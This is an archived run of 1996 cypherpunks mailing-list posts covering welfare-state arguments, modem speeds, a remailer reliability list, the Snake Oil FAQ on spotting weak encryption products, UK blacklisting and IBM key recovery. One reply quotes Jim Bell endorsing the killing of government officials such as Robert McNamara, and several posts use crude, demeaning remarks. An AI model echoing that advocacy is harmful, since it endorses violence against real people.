> approaches true randomness, and cannot be decrypted in practice except
> through the exact mirror-image reversal of the encryption passes.

So what do the encryption keys look like? And what's this "true randomness" stuff?

______c_________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being,
m5 at tivoli.com * m101 at io.com *
* three heads and eight arms.

From jbugden at smtplink.alis.ca Mon Sep 16 10:30:57 1996
From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca)
Date: Tue, 17 Sep 1996 01:30:57 +0800
Subject: Workers Paradise. /Political rant.
Message-ID: <9608168428.AA842891743@smtplink.alis.ca>

tcmay at got.net (Timothy C. May) writes:
> Crypto Anarchy means getting rid of deadwood the old-fashioned way.

dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) wrote:
>Starting with the lying old fart himself.

You shouldn't be so hard on Tim. I tried giving up farting years ago but I found I gained a lot of weight. It's also become more socially acceptable as evidenced by the new farting section in many English pubs. They even have a special section for me on some international flights. And unlike smoking, you *can* do it in the toilet.

Besides, it can't be worse than smoking. Unless, perhaps, you do both at the same time...

Cheers,
James

From rp at rpini.com Mon Sep 16 10:31:01 1996
From: rp at rpini.com (Remo Pini)
Date: Tue, 17 Sep 1996 01:31:01 +0800
Subject: 56 kbps modems
Message-ID: <9609161402.AA11975@srzts100.alcatel.ch>

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
To: cypherpunks at toad.com
Date: Mon Sep 16 15:59:53 1996

I think I have to throw in some words here, too:

1. BAUD is one distinguishable signal form.
2. BPS is bits per second
3.
NO transmission over a standard phoneline can have more than 3100 baud, because the frequency of anything transmitted over that line is band limited to 300hz - 3400hz. (If you have ISDN it's not relevant anyway, since you are fixed with 8000hz or 64000 bps->in europe :), 56000 bps in usa)
4. Most modern transmission schemes work with multiple bits per baud. I.e. you transmit 10 bits in one baud if you have a 31000 bps modem.

the only limitation in transmission speed is the amount of binary values you can pack into one baud. that on the other hand is limited by the S/N (signal to noise) ratio of your line. If you have a noise of 0.9%, you can't use more than 100 steps or you have ambiguous signals.

since people talk about 56000 bps modems (we tried 34000 modems here and they couldn't produce more than 28800 on a very good connection) that would mean, that you have to transmit 18 bits = 262144 (!) distinguishable signal forms per baud.

Comments?

Remo Pini

- ------< fate favors the prepared mind >------
Remo Pini rp at rpini.com
PGP: http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

-----END PGP SIGNATURE-----

From raph at CS.Berkeley.EDU Mon Sep 16 10:39:46 1996
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Tue, 17 Sep 1996 01:39:46 +0800
Subject: List of reliable remailers
Message-ID: <199609161350.GAA29246@kiwi.cs.berkeley.edu>

I operate a remailer pinging service which collects detailed information about remailer features and reliability.
To use it, just finger remailer-list at kiwi.cs.berkeley.edu

There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

For the PGP public keys of the remailers, finger pgpkeys at kiwi.cs.berkeley.edu

This is the current info:

REMAILER LIST

This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu.

$remailer{"extropia"} = " cpunk pgp special";
$remailer{"c2"} = " eric pgp hash reord";
$remailer{"penet"} = " penet post";
$remailer{"flame"} = " cpunk mix pgp.
 hash latent cut post reord";
$remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = " cpunk mix";
$remailer{"amnesia"} = " cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = ' alpha pgp';
$remailer{'nymrod'} = ' alpha pgp';
$remailer{"lead"} = " cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = " cpunk pgp hash latent cut";
$remailer{"exon"} = " cpunk pgp hash latent cut ek";
$remailer{"vegas"} = " cpunk pgp hash latent cut";
$remailer{"haystack"} = " cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = " mix cpunk pgp hash latent";
$remailer{"lucifer"} = " cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = " cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = " cpunk pgp hash cut ksub reord";
$remailer{'nym'} = ' newnym pgp';
$remailer{"balls"} = " cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = " cpunk mix pgp hash latent cut ek";
$remailer{"middle"} = " cpunk mix pgp hash middle latent cut ek reord";
$remailer{'cyber'} = ' alpha pgp';
$remailer{"dustbin"} = " cpunk pgp hash ksub latent cut ek mix reord";
catalyst at netcom.com is _not_ a remailer.
lmccarth at ducie.cs.umass.edu is _not_ a remailer.
usura at replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(cyber mix)

The alpha and nymrod nymservers are down due to abuse. However, you can use the cyber nymserver.

The nym.alias.net server will be listed soon. See http://www.cs.berkeley.edu/~raph/n.a.n.html for details.

403 Permission denied errors have been caused by a flaky disk on the Berkeley WWW server. Hopefully, this is fixed by now.

The penet remailer is closed.
Last update: Mon 16 Sep 96 6:48:06 PDT

remailer  email address                      history        latency   uptime
-----------------------------------------------------------------------
exon      remailer at remailer.nl.com        *#**##*#***#   1:16      100.00%
jam       remailer at cypherpunks.ca         *****++*****   17:07     99.99%
squirrel  mix at squirrel.owl.de             -+++---++++    2:04:26   99.98%
mix       mixmaster at remail.obscura.com    +++++++++--+   1:01:22   99.98%
lead      mix at zifi.genetics.utah.edu      + -++*++++++   41:18     99.84%
amnesia   amnesia at chardos.connix.com      -----------    3:38:09   99.82%
dustbin   dustman at athensnet.com           -+ ++----+     1:24:30   99.74%
cyber     alias at alias.cyberpass.net       * **+ ++*+ *   33:26     99.37%
extropia  remail at miron.vip.best.com       ------.--.-    13:13:34  99.13%
haystack  haystack at holy.cow.net           *###-#*#####   3:35      98.87%
middle    middleman at jpunix.com            -- - --+       2:53:19   98.74%
replay    remailer at replay.com             ****+* *****   4:45      98.13%
winsock   winsock at c2.org                  --- -+--++     1:20:34   97.83%
balls     remailer at huge.cajones.com       ******** *     5:06      88.34%
nemesis   remailer at meaning.com            *              24:33     4.73%

History key
* # response in less than 5 minutes.
* * response in less than 1 hour.
* + response in less than 4 hours.
* - response in less than 24 hours.
* . response in more than 1 day.
* _ response came back too late (more than 2 days).

cpunk     A major class of remailers. Supports Request-Remailing-To: field.
eric      A variant of the cpunk style. Uses Anon-Send-To: instead.
penet     The third class of remailers (at least for right now). Uses X-Anon-To: in the header.
pgp       Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID.
hash      Supports ## pasting, so anything can be put into the headers of outgoing messages.
ksub      Remailer always kills subject header, even in non-pgp mode.
nsub      Remailer always preserves subject header, even in pgp mode.
latent    Supports Matt Ghio's Latent-Time: option.
cut       Supports Matt Ghio's Cutmarks: option.
post      Post to Usenet using Post-To: or Anon-Post-To: header.
ek        Encrypt responses in reply blocks using Encrypt-Key: header.
special   Accepts only pgp encrypted messages.
mix       Can accept messages in Mixmaster format.
reord     Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself.
mon       Remailer has been known to monitor contents of private email.
filter    Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering.

Raph Levien

From jbugden at smtplink.alis.ca Mon Sep 16 11:09:12 1996
From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca)
Date: Tue, 17 Sep 1996 02:09:12 +0800
Subject: Workers Paradise. /Political rant.
Message-ID: <9608168428.AA842894324@smtplink.alis.ca>

tcmay at got.net (Timothy C. May) wrote:
>"Saving for a rainy day," whether saving, investing, getting an education (while others are out partying), preparing, etc., all takes effort and commitment. If those who save and prepare are then told they have to pay high taxes to support those who partied....well, the predictable effect [...] is _more_ people in agony. When you tell people that a compassionate society will meet their basic needs, a predictable fraction of them will choose not to work hard and prepare themselves.

Two questions, two observations:

Do you have health insurance? Do you have life insurance?

I have commented on your line of reasoning before and it still seems to me that an important part of the discussion is missed. Specifically, that anyone can "save for a rainy day" and still not be able to provide for events that can always happen: Heart attack, stroke, car accident, pinched nerve that leaves you in excruciating pain and unable to work for several years.
I don't think that a reasonable person would argue that medical insurance should be outlawed because everyone should take care of their own needs. A social safety net is simply a form of health and life insurance. Statistical arbitrage if you will. By spreading the risk you minimize the cost. Yes, some people will take advantage of the system. But like a virus, a robust system should be able to withstand this form of attack.

I'm reminded of a Bloom County cartoon with Opus, Steve Dallas and Bill the cat sitting on a park bench as a jogger runs past. He derides the trio saying, "I jog three miles and work out every day, eat only healthy foods, and have regular medical checkups. I'll live twice as long as you lazy slobs." In the next panel the jogger is hit by lightning as the trio on the bench look on in shock. The last panel: "Here's to no guarantees!" and "Pass the ding dongs."

Take care,
James

[Bible excerpt awaiting review as a motivation for human decency.]

The ground of a certain rich man brought forth plentifully: And he thought within himself, saying, What shall I do, because I have no room where to bestow my fruits? And he said, This will I do: I will pull down my barns, and build greater; and there will I bestow all my fruits and my goods. And I will say to my soul, Soul, thou hast much goods laid up for many years; take thine ease, eat, drink, and be merry. But God said unto him, Thou fool, this night thy soul shall be required of thee: then whose shall those things be, which thou hast provided?

[excerpted from Luke 12:16-20, King James Version]

From nobody at replay.com Mon Sep 16 11:47:28 1996
From: nobody at replay.com (Anonymous)
Date: Tue, 17 Sep 1996 02:47:28 +0800
Subject: Workers Paradise. /Political rant.
In-Reply-To:
Message-ID: <199609161427.QAA05854@basement.replay.com>

Jim McCoy wrote:
> Anonymous wrote:
> >Tim May wrote:
> >
> >> The thing about _traditional_ charity, of the religious or community sort,
> >> was that it was not treated as an "entitlement," as something the resentful
> >> masses could "demand" as part of their "human rights."
> >
> > There's no substantial difference between their resentful whining about
> >their rights and your resentful whining about your rights - except maybe
> >that you whine more.
>
> Actually there is a fundamental difference: what Tim demands is the
> right to be left alone and to be free from external influence as long
> as what he is doing does not directly hurt another, what "they" demand
> is to be taken care of by others because they either cannot or choose not
> to take care of themselves. The latter requires that someone productive
> (like Tim) be forced to take care of them through taxation or otherwise
> at gunpoint.

Tim is not productive. He *was* productive, but not anymore; his wealth might be productive in some indirect way, but it is certainly severable from him. He demands to be left alone by certain socio-economic apparatuses (socialized welfare) but is quite content to rely on the existence of other such apparatuses (investment entities, banks). Whether *that* is "hypocritical" doesn't interest me; I merely pointed out that he is constantly and resentfully whining about his own "rights" and about others' lack thereof--in that regard, he's of a kind with the people he is forever griping about.

> In most societies this is considered the difference between a child and
> an adult...
This is a silly statement of the kind often made by people who have no solid grasp of history or social organization: most societies that radically differ from our own in their ways of maintaining/supervising their members (successful or not) have apparatuses so invasive and arbitrary that, in comparison, the IRS and assorted other bureaucracies look pretty benign. From nobody at replay.com Mon Sep 16 12:17:24 1996 From: nobody at replay.com (Anonymous) Date: Tue, 17 Sep 1996 03:17:24 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <199609160641.AAA23324@InfoWest.COM> Message-ID: <199609161433.QAA06393@basement.replay.com> attila: > = . There's no substantial difference between their resentful whining about > = .their rights and your resentful whining about your rights - except maybe > = .that you whine more. [silly remarks about crapping, watermelons, and hypocrites deleted] > I'm not whining about it my rights any more than Tim is > whining about his. One of the principals of the American > Revolution was NO TAXATION WITHOUT REPRESENTATION. When our > government takes my money and creates a new class which "votes" > to require me to pay for them; they are a vested interest voting > only for their own gain without my consent. My full remarks are above; I never defended the present system. > human rights are supposedly universal. however, since when > has an entitlement been considered a "human right?" Never, AFAIK. > are you playing the part of the bleeding knee-jerk welfare > advocate? The type: "I'm willing to give mine, (but I cheat on > my taxes) --just make sure you let the Feds extort their welfare > system from _your_ profits. No. > charity is man's _benevolence_ and, there is nothing in the > scriptures which says the lazy and resentful are _entitled_ to > my support. Charity has many definitions; in the Judeo-Christian tradition, benevolence is not a prominent one. 
Nor are sawed off accusations of laziness and resentfulness very indicative of caritas, OTOH. > I tithe, and tithe faithfully; and contribute a fast offering > every month for the ward bishop's fund. as in says in the > scriptures, he who faithfully tithes shall receive it tenfold. > we take care of our own community, and we don't collect welfare. > > it works. That is an excellent thing, and you should do it regardless of returns; we all should. I do. From m5 at tivoli.com Mon Sep 16 12:35:02 1996 From: m5 at tivoli.com (Mike McNally) Date: Tue, 17 Sep 1996 03:35:02 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <9608168428.AA842894324@smtplink.alis.ca> Message-ID: <323D6B95.7BC9@tivoli.com> jbugden at smtplink.alis.ca wrote: > > A social safety net is simply a form of health and life > insurance. And a really neat-o form it is, too! All it takes is an armed force to coerce the unwilling into paying the premiums of those who don't pay their own. > Statistical arbitrage if you will. By spreading the risk you > minimize the cost. Yea right. > Yes, some people will take advantage of the system. But like a > virus, a robust system should be able to withstand this form of > attack. Sure; it's heavily armed, after all. Just gather up some more loot. ______c_________________________________________________________________ Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being, m5 at tivoli.com * m101 at io.com * * three heads and eight arms. From hallam at ai.mit.edu Mon Sep 16 12:43:03 1996 From: hallam at ai.mit.edu (hallam at ai.mit.edu) Date: Tue, 17 Sep 1996 03:43:03 +0800 Subject: SPL -- Suspicious Persons List In-Reply-To: <199609160558.WAA11070@dfw-ix6.ix.netcom.com> Message-ID: <9609161519.AA00274@etna.ai.mit.edu> >(Just because I don't believe in the concept of "corporate slavery" >doesn't mean I don't think corporations can be offensive. This sucks...) 
>Out of curiosity, I thought the UK had Data Privacy Laws or
>some sort of Database Cops - does that not apply to applications like this?

The Tories put an exclusion into the act deliberately to cover the Economic League. Only records which are kept on computer are covered. The Economic League deliberately keeps all its records on paper to avoid the act.

It's simply an example of privatized abuse. The information is available to the government for party political work but they cannot be questioned about its activities because they "aren't involved" (sarcastic laughter).

This is the same government which used MI5 to monitor the activities of the peace movement and which used 5000 crack troops to evict 50 elderly women from land they wanted to turn into a missile base. Whether you agree or disagree with the policies the methods sound very much like those of Hoover at the FBI with a strong dose of Nixon thrown in.

Phill

From shamrock at netcom.com Mon Sep 16 13:20:56 1996
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 17 Sep 1996 04:20:56 +0800
Subject: IBM_gak
In-Reply-To: <199609161225.MAA10936@pipe1.ny3.usa.pipeline.com>
Message-ID:

On Mon, 16 Sep 1996, John Young wrote:
> 9-15-96. PcWe:
>
> "IBM Boosts Encryption Initiative "
>
> IBM security initiatives next month will include a
> new way to build encryption into software and
> technology that could enable U.S. companies to export
> products with strong encryption algorithms. IBM also
> will introduce several "key-recovery" technologies
> that could enable businesses to satisfy the
> requirement imposed by the U.S. government that it be
> able to access encrypted data on demand.

Apparently, Al Gore's recent phone calls to everybody who is anybody in the industry have paid off. After HP, TIS, and other unnamed parties, now IBM is supporting GAK.

Folks, this battle is lost. Domestic GAK is coming to a PKI near you.

--Lucky

From tcmay at got.net Mon Sep 16 13:21:18 1996
From: tcmay at got.net (Timothy C.
May) Date: Tue, 17 Sep 1996 04:21:18 +0800 Subject: Workers Paradise. /Political rant. Message-ID: At 3:18 PM 9/16/96, jbugden at smtplink.alis.ca wrote: >I don't think that a reasonable person would argue that medical insurance >should >be outlawed because everyone should take care of their own needs. A social >safety net is simply a form of health and life insurance. Statistical arbitrage >if you will. By spreading the risk you minimize the cost. Yes, some people will >take advantage of the system. But like a virus, a robust system should be able >to withstand this form of attack. I have never argued against insurance! People who wish to buy insurance are welcome to, obviously. As to the "social safety net," things are far, far beyond a simple safety net. When 14-year-old pregnant inner city girls are given money to set up their own households (cf. Charles Murray's "Losing Ground"), this is not a "safety net," this is subsidized breeding. And so on. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From nobody at replay.com Mon Sep 16 13:45:47 1996 From: nobody at replay.com (Anonymous) Date: Tue, 17 Sep 1996 04:45:47 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <199609160641.AAA23324@InfoWest.COM> Message-ID: <199609161550.RAA12811@basement.replay.com> attila wrote: > = . There's no substantial difference between their resentful whining about > = .their rights and your resentful whining about your rights - except maybe > = .that you whine more. > > that is worse than a cheap shot... 
like a man low enough to
> shoot another while he's taking a crap.

Initially this struck me as an inane analogy, so I snipped it (with mention) from my response; in retrospect I see just how shrewdly you captured the scene. Pure poetry. I *was* aiming at a guy who was shitting. ;)

From cmcurtin at research.megasoft.com Mon Sep 16 13:54:26 1996
From: cmcurtin at research.megasoft.com (C Matthew Curtin)
Date: Tue, 17 Sep 1996 04:54:26 +0800
Subject: Snake Oil FAQ 0.4 [comments appreciated]
Message-ID: <199609161356.JAA09796@goffette.research.megasoft.com>

The Snake Oil FAQ version 0.4 is waiting for you to look at it and comment on
http://research.megasoft.com/people/cmcurtin/snake-oil/snake-oil-faq.html

The text version follows...

-matt

--------------------------- snake-oil-faq ----------------------------

Snake-Oil Warning Signs
Encryption Software to Avoid

$Id: snake-oil-faq.html,v 0.4 1996/09/16 13:52:26 cmcurtin Exp $

Distribution

Please do not distribute this beyond the circles of cryptographic competence yet. This is an incomplete work-in-progress. Feedback is greatly appreciated.

The Snake Oil FAQ is (to be) posted monthly to cypherpunks, sci.crypt, alt.security, comp.security, and comp.infosystems. We're targeting those who have influence over or direct involvement in the purchasing decisions of computer security software and equipment in the corporate and academic worlds, as well as individual users who wish to assert their privacy through the use of good cryptography.

Disclaimer

All contributors' employers will no doubt disown any statements herein. We're not speaking for anyone but ourselves, based on our own experiences, etc., etc., etc.

This is a general guideline, and as such, cannot be the sole metric by which a security product is rated, since there can be exceptions to any of these rules. (But if you're looking at something that sounds familiar on several of the 'things to watch out for,' you're probably dealing with snake oil.
From time to time, a reputable and decent vendor will produce something that is actually quite good, but will use some braindead marketing technique, so be aware of exceptions.)

Every effort has been made to produce an accurate and useful document, but the information contained herein is completely without warranty. If you find any errors, or wish to otherwise contribute, please contact the document keeper, C Matthew Curtin

Introduction

Good cryptography is an excellent and necessary tool for almost anyone. However, there is a multitude of products around. Many good cryptographic products are available, both commercial (including shareware) and free. However, there are also some extremely bad cryptographic products (known in the field as "Snake Oil"), which not only fail to do their job of providing security, but are based on, and add to, the many misconceptions and misunderstandings surrounding cryptography and security.

Superficially, it is difficult for someone to distinguish the output of a secure encryption utility from snake oil: both look garbled. The purpose of this document is to present some obvious "red flags" so that people unfamiliar with the nuts and bolts of cryptography can use them as a guideline for determining whether they're dealing with snake oil or the Real Thing.

For a variety of reasons, this document is general in scope and does not mention specific products or algorithms as being "good" or "Snake Oil".

When evaluating any product, be sure to understand what your needs are. For data security products, what do you need protected? Do you want an archiver that supports strong encryption? An E-mail client? Something that will encrypt on-line communications? Do you want to encrypt an entire disk or partition, or selectively some files? Do you need on-the-fly (automatic) encryption and decryption, or are you willing to select when and which files you want encrypted? How secure is "secure enough?"
Does the data need to be unreadable by third parties for 5 minutes? One year? 50 years? 100 years?

Different products will serve different needs, and it's rare that a product will serve every need. (Sometimes a product won't be needed: it may be better to use a utility to encrypt files, transmit them over a network using standard file transfer tools, and decrypt them at the other end than to use a separate encrypted utility in some cases.)

Some basics

The cryptography-faq (found at ftp://rtfm.mit.edu/pub/usenet/cryptography-faq/) is a more general tutorial of cryptography, and should also be consulted. In an effort to make this FAQ more complete, some very basic topics are included below.

Conventional vs. Public Key Cryptography

There are two basic types of cryptosystems: symmetric (also known as "conventional," sometimes also called "private key") and asymmetric (public key).

Symmetric ciphers require both the sender and the recipient to have the same key. That key is applied to encrypt the data by the sender, and again by the recipient to decrypt the data.

Asymmetric ciphers are much more flexible, from a key management perspective. Each user has a pair of keys: a public key and a private key. The public key is shared widely, given to everyone, while the private key is kept secret. If Alice wishes to mail Bob some secrets, she simply gets Bob's public key, encrypts her message with it, and sends it off to Bob. When Bob gets the message, he uses his private key to decrypt the message.

Asymmetric cryptosystems are much slower than their symmetric counterparts. Also, key sizes must be much larger. See the cryptography FAQ for a more detailed discussion of the topic.

Key Sizes

Some ciphers, while currently secure against most attacks, are not considered viable in the next few years because of relatively small keysizes and increasing processor speeds (making brute-force attacks feasible).
The tables below should give some general guidelines for making intelligent decisions about the key length you need. If the key is too short, the system will be easily broken, even if the cipher is a good one.

In [1] and [2], we're presented with some guidelines for deciding appropriate key length. (It is important to note that this is based on the ability to predict computing power 40, 65, and 100 years from now. Major breakthroughs in computing power 30 years from now might render everything on this chart kiddieplay.)

Security Requirements for Different Information

Type of Traffic                                  Lifetime        Minimum [Symmetric] Key Length
-----------------------------------------------  --------------  ------------------------------
Tactical military information                    minutes/hours   56-64 bits
Product announcements, mergers, interest rates   days/weeks      64 bits
Long-term business plans                         years           64 bits
Trade secrets (e.g., recipe for Coca-Cola)       decades         112 bits
H-bomb secrets                                   >40 years       128 bits
Identities of spies                              >50 years       128 bits
Personal affairs                                 >50 years       128 bits
Diplomatic embarrassments                        >65 years       at least 128 bits
U.S. Census data                                 100 years       at least 128 bits

As mentioned earlier, asymmetric ciphers require significantly longer keys to provide the same level of security as their symmetric cipher counterparts. Here is a comparison table, again, from Applied Cryptography, second edition.

Symmetric and Public-Key Lengths With Similar Resistance to Brute-Force Attacks

Symmetric Key Length   Public-key Key Length
--------------------   ---------------------
56 bits                384 bits
64 bits                512 bits
80 bits                768 bits
112 bits               1792 bits
128 bits               2304 bits

Some Common Snake-Oil Warning Signs

The following are some of the "red flags" one should watch for when examining an encryption product

* Technobabble

  The vendor's description of the product may contain a lot of hard-to-follow use of technical terms to describe how the product works. If this appears to be confusing nonsense, it may very well be (even to someone familiar with the terminology).
  Technobabble is a good means of confusing a potential user and masking the fact that the vendor doesn't understand anything either.

  A sign of technobabble is a description which drops a lot of technical terms for how the system works without actually explaining how it works. Often specifically coined terms are used to describe the scheme which are not found in the literature.

* New Type of Cryptography?

  Beware of any vendor who claims to have invented a "new type of cryptography" or a "revolutionary breakthrough". Truly "new break-throughs" are likely to show up in the literature, and many in the field are unlikely to trust them until after years of analysis, by which time they are not so new anymore.

  Avoid software which claims to use 'new paradigms' of computing such as cellular automata, neural nets, genetic algorithms, chaos theory, etc. Just because software uses a different method of computation doesn't make it more secure.

  Anything that claims to have invented a new public key cryptosystem without publishing the details or underlying mathematical principles is highly suspect. Modern cryptography, especially public key systems, is grounded in mathematical theory. The security is based on problems that are believed, if not known, to be hard to solve.

  The strength of any encryption scheme is only proven by the test of time. New crypto is like new pharmaceuticals, not new cars.

* Proprietary Algorithms

  Avoid software which uses "proprietary" or "secret" algorithms. Security through obscurity is not considered a safe means of protecting your data. If the vendor does not feel confident that the method used can withstand years of scrutiny by the academic community, then you should be wary of trusting it. (Note that a vendor who specializes in the cryptography may have a proprietary algorithm which they'll show to others if they sign a non-disclosure agreement. If the vendor is well-reputed in the field, this can be an exception.)
  Beware of specially modified versions of well-known algorithms. This may intentionally or unintentionally weaken the cipher.

  The use of a trusted algorithm, if not with technical notes explaining the implementation (if not availability of the source code for the product) are a sign of good faith on the part of the vendor that you can take apart and test the implementation yourself.

  A common excuse for not disclosing how a program works is that "hackers might try to crack the program's security." While this may be a valid concern, it should be noted that such 'hackers' can reverse engineer the program to see how it works anyway. If the program is implemented properly and the algorithm is secure, this is not a problem. (If a hypothetical 'hacker' was able to get access to your system, access to encrypted data might be the least of your problems.)

* Experienced Security Experts and Rave Reviews

  Beware of any product claiming that "experienced security experts" have analyzed it, but it won't say who (especially if the scheme has not been published in a reputable journal).

  Don't rely on reviews in newspapers, magazines or television shows, since they generally don't have cryptologists (celebrity hackers who know about telephone systems don't count) take the software apart for them.

  Just because the vendor is a well known company or the algorithm is patented doesn't make it secure either.

* Unbreakability

  Some vendors will claim their software is "unbreakable". This is marketing hype, and a common sign of snake-oil. Avoid any vendor that makes unrealistic claims.

  No algorithm is unbreakable. Even the best algorithms are breakable using "brute force" (trying every possible key), but if the key size is large enough, this is impractical even with vast amounts of computing power.

  One-time pads are unbreakable, but they must be implemented perfectly, which is, at best, very difficult. See the next section for a more detailed discussion.
* One-Time-Pads

  A vendor might claim the system uses a one-time-pad (OTP), which is theoretically unbreakable. That is, snake-oil sellers will try to capitalize on the known strength of a OTP. It is important to understand that any variation in the implementation means that it is not an OTP, and has nowhere near the security of an OTP.

  A OTP system is not an algorithm. It works by having a "pad" of random bits in the possession of both the sender and recipient. The message is encrypted using the next n bits in the pad as the key, where n is the number of bits in the message. After the bits are used from the pad, they're destroyed, and can never again be used.

  The bits in the pad must be truly random, generated using a real random source, such as specialized hardware, radioactive decay timings, etc., and not from an algorithm or cipher. Anything else is not a one-time-pad.

  The vendor may confuse random session keys or initialization vectors with OTPs.

* Algorithm or product XXX is insecure

  Be wary of anything that makes claims that particular algorithms or other products are insecure without backing up those claims (or at least citing references to them). Sometimes attacks are theoretical or impractical (requiring special circumstances or massive computing power running for many years), and it's easy to confuse a layman by mentioning these.

* Keys and Passwords

  The "key" and the "password" are often not the same thing. The "key" generally refers to the actual data used by the cipher, while the "password" refers to the word or phrase the user types in, which the software converts into the key (usually through a process called "hashing" or "key initialization").

  The reason this is done is because the characters a user is likely to type in do not cover the full range of possible characters. (Such keys would be more redundant and easier for an attacker to guess.) By hashing a key can be made from an arbitrary password that covers the full range of possible keys.
  It also allows one to use longer words, or phrases and whole sentences as a "passphrase", which is more secure. Anything that restricts users' passwords to something like 10 or 16 or even 32 characters is foolish.

  If the actual "password" is the cipher's key (rather than hashing it into a key, as explained above), avoid it.

  If the vendor confuses the distinctions between bits, bytes and characters when discussing the key, avoid this product.

  Convenience is nice, but be wary of anything that sounds too easy to use. Avoid anything that lets anyone with your copy of the software access files, data, etc. without having to use some sort of key or passphrase.

  Avoid anything that doesn't let you generate your own keys (ie, the vendor sends you a key in the mail, or it's embedded in the copy of the software you buy).

  Avoid anything by a vendor who does not seem to understand the difference between public-key (asymmetric) cryptography and private-key (symmetric) cryptography.

* Lost keys and passwords

  If there's a third-party utility that can crack the software, avoid it.

  If the vendor claims it can recover lost passwords (without using a key-backup or escrow feature), avoid it.

  If there is a key-backup or escrow feature, are you in control of the backup, or does the vendor or someone else hold a copy of the key?

* Exportable from the USA

  If the software is made in North America, can it be exported? If the answer is yes, chances are it's not very strong. Strong cryptography is considered munitions in terms of export from the United States, and requires approval from the State Department. Chances are if the software is exportable, the algorithm is weak or it is crackable (hence it was approved for export).

  If the vendor is unaware of export restrictions, avoid the software: the vendor is not familiar with the state of the art.
  Because of export restrictions, some legitimate (not-Snake Oil) products may have a freely exportable version for outside of the USA, which is different from a separate US/Canada-only distribution.

  Also note that just because software has made it outside of North America does not mean that it is exportable: sometimes a utility will be illegally exported and posted on an overseas site.

Other Considerations

Interface isn't everything: user-friendliness is an important factor, but if the product isn't secure then you're better off with something that is secure (if not as easy to use).

No product is secure if it's not used properly. You can be the weakest link in the chain if you use a product carelessly. Do not trust any product to be foolproof, and be wary of any product that claims it is.

Contributors

The following folks have contributed to this FAQ.

Jeremey Barrett
Jim Ray
Robert Rothenburg Walking-Owl

References

1. B. Schneier, Applied Cryptography, second edition, John Wiley & Sons, 1996
2. M. Blaze, W. Diffie, R. L. Rivest, B. Schneier, T. Shimomura, E. Thompson, M. Wiener, "Minimal Key Lengths for Symmetric Ciphers to Provide Adequate Commercial Security," available via ftp://ftp.research.att.com/dist/mab/keylength.ps

----------------------------------------------------------------------------
C Matthew Curtin
Last modified: Mon Sep 16 09:51:41 EDT
----------------------------------------------------------------------
--
C Matthew Curtin MEGASOFT, INC Chief Scientist
I speak only for myself. Don't whine to anyone but me about anything I say.
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet cmcurtin at research.megasoft.com http://research.megasoft.com/people/cmcurtin/ From bdavis at thepoint.net Mon Sep 16 14:41:42 1996 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 17 Sep 1996 05:41:42 +0800 Subject: The Living and the Dead In-Reply-To: <199609160416.VAA08027@mail.pacifier.com> Message-ID: On Sun, 15 Sep 1996, jim bell wrote: > .... > How would an AP-type system treat Robert McNamara? He'd be dead in a > second. To those who say, "What good would this do?" I respond: Anyone in ^^^^^^ Kind of kills the betting pool, doesn't it? EBD > the American government today who is considering an adventure which MIGHT > turn into another Vietnam should be deterred by the knowledge that sometime, > in 30 minutes or 30 years, he could be killed for what he did. Robert > McNamara, presumably, did what he did because he thought he'd never be > punished. The best way to deter future governmental abuse is to remind > these people that they _will_ be punished. > > Jim Bell > jimbell at pacifier.com > From ses at tipper.oit.unc.edu Mon Sep 16 14:43:35 1996 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Tue, 17 Sep 1996 05:43:35 +0800 Subject: SPL -- Suspicious Persons List In-Reply-To: <199609160558.WAA11070@dfw-ix6.ix.netcom.com> Message-ID: On Sun, 15 Sep 1996, Bill Stewart wrote: > > >I am on an SPL that is run by an organisation called the "Ecconomic > >League". It is an organisation run by the UK Conservative party > >which keeps lists of "unsafe" employees. Of course the list is > (Just because I don't believe in the concept of "corporate slavery" > doesn't mean I don't think corporations can be offensive. This sucks...) > Out of curiousity, I thought the UK had Data Privacy Laws or > some sort of Database Cops - does that not apply to applications like this? 
